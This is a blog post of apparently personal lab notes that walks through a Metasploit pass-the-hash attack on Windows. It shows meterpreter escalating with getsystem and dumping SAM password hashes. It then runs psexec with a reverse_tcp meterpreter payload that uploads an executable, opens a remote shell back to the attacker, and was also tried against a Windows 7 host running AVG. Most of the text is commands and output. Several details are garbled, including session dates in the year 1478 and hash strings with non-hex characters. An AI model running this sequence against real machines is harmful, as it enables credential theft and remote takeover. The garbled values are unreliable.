control – metasploit pass the hash

Note – pass the hash only seems to work with local accounts stored in the SAM

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY removed2e0c9b7removed8c6d87494f5…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter > use priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > getsystem
…got system (via technique 1).
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY removed2e0c9b7removed8c6d87494f5…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…

No users with password hints on this system

[*] Dumping password hashes…

Administrator:500:abcb51404eeab51404eeaad3b:28scfe0d16ae93f9e12:::
Guest:501:removed2e0c9b7removed8c6d87494f5:removed2e0c9b7removed8c6d87494f5:::
mark:1003:abc3b4178ab51404eeaad3b:47741scfe0d16ae931a0d6329f9 :::

meterpreter >

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.28.2
msf exploit(psexec) > set rhost 192.168.28.9
msf exploit(psexec) > set smbuser Administrator
msf exploit(psexec) > set SMBPass abcb51404eeab51404eeaad3b:28scfe0d16ae93f9e12
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.28.2:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.28.9:445|WORKGROUP as user ”…

[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.

———————————————————-

Note it failed I believe because the local machine gets confused seeing administrator as this is also a AD DC user and not stored in the SAM.

———————————————————-

Testing one of the local users on the machine works.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.28.2
msf exploit(psexec) > set rhost 192.168.28.9
msf exploit(psexec) > set smbuser mark
msf exploit(psexec) > set SMBPass abc3b4178ab51404eeaad3b:47741scfe0d16ae931a0d6329f9
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.28.2:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.28.9:445|WORKGROUP as user ‘mark’…
[*] Uploading payload…
[*] Created \yyxZqluJ.exe…
[*] Binding to @ncacn_np:192.168.28.9[\svcctl] …
[*] Bound to @ncacn_np:192.168.28.9[\svcctl] …
[*] Obtaining a service manager handle…
[*] Creating a new service (ghyrYzdt – “MYjsoBisnV”)…
[*] Closing service handle…
[*] Opening service…
[*] Starting the service…
[*] Removing the service…
[*] Closing service handle…
[*] Deleting \yyxZqluJ.exe…
[*] Sending stage (764928 bytes) to 192.168.28..9
[*] Meterpreter session 1 opened (192.168.28.2:4444 -> 192.168.28.9:1414) at 1478-02-01 09:24:35 +0100

——————————————————-

Testing with AV – picks this up as Trojan horse Generic18.CFYT

Below testing against Win7 and AVG enabled.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost Local-IP-Address
msf exploit(psexec) > set rhost Remote-IP-Address
msf exploit(psexec) > set smbuser test1
msf exploit(psexec) > set SMBPass 04eeaad3b435b51404ee:8846f7eaee8fb117ad06b
msf exploit(psexec) > exploit

[*] Started reverse handler on Local-IP-Address:443
[*] Connecting to the server…
[*] Authenticating to Remote-IP-Address:445|WORKGROUP as user ‘test1’…
[*] Uploading payload…
[*] Created \xEDjSYLP.exe…
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:Remote-IP-Address[\svcctl] …
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:Remote-IP-Address[\svcctl] …
[*] Obtaining a service manager handle…
[*] Creating a new service (UoWGiOSH – “MzifhLxESA”)…
[*] Closing service handle…
[*] Opening service…
[*] Starting the service…
[*] Removing the service…
[*] Closing service handle…
[*] Deleting \xEDjSYLP.exe…
[*] Sending stage (764928 bytes) to Remote-IP-Address
[*] Meterpreter session 5 opened (Local-IP-Address:443 -> Remote-IP-Address:49169) at 1478-09-14 12:37:44 +0100

meterpreter >

——————————————

If you see this [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect when trying to get hash

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0
272 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
356 348 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
368 864 dwm.exe x86 1 test-PC\test C:\Windows\system32\Dwm.exe
404 348 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
412 396 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
416 288 explorer.exe x86 1 test-PC\test C:\Windows\Explorer.EXE
452 396 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
500 404 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
508 404 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
516 404 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
604 500 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
660 500 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\VBoxService.exe
712 500 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
820 500 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 500 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
896 500 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
940 1808 SearchFilterHost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
996 820 audiodg.exe x86 0
1068 500 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1148 500 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1252 500 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1300 500 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1380 500 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
1532 416 VBoxTray.exe x86 1 test-PC\test C:\Windows\System32\VBoxTray.exe
1652 416 Project1.exe x86 1 test-PC\test C:\Users\test\Desktop\Project1.exe
1744 500 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1808 500 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2008 500 taskhost.exe x86 1 test-PC\test C:\Windows\system32\taskhost.exe
2056 500 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
2212 1808 SearchProtocolHost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe
2248 500 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2420 604 WmiPrvSE.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
3100 500 sppsvc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\sppsvc.exe
3128 500 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe

AVG picks this up as Trojan horse Generic18.CFYT (c:\Windows\nBIOkNNE.exe)

To try and crack link

https://myexploit.wordpress.com/control-hashcat-hash-cracker/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s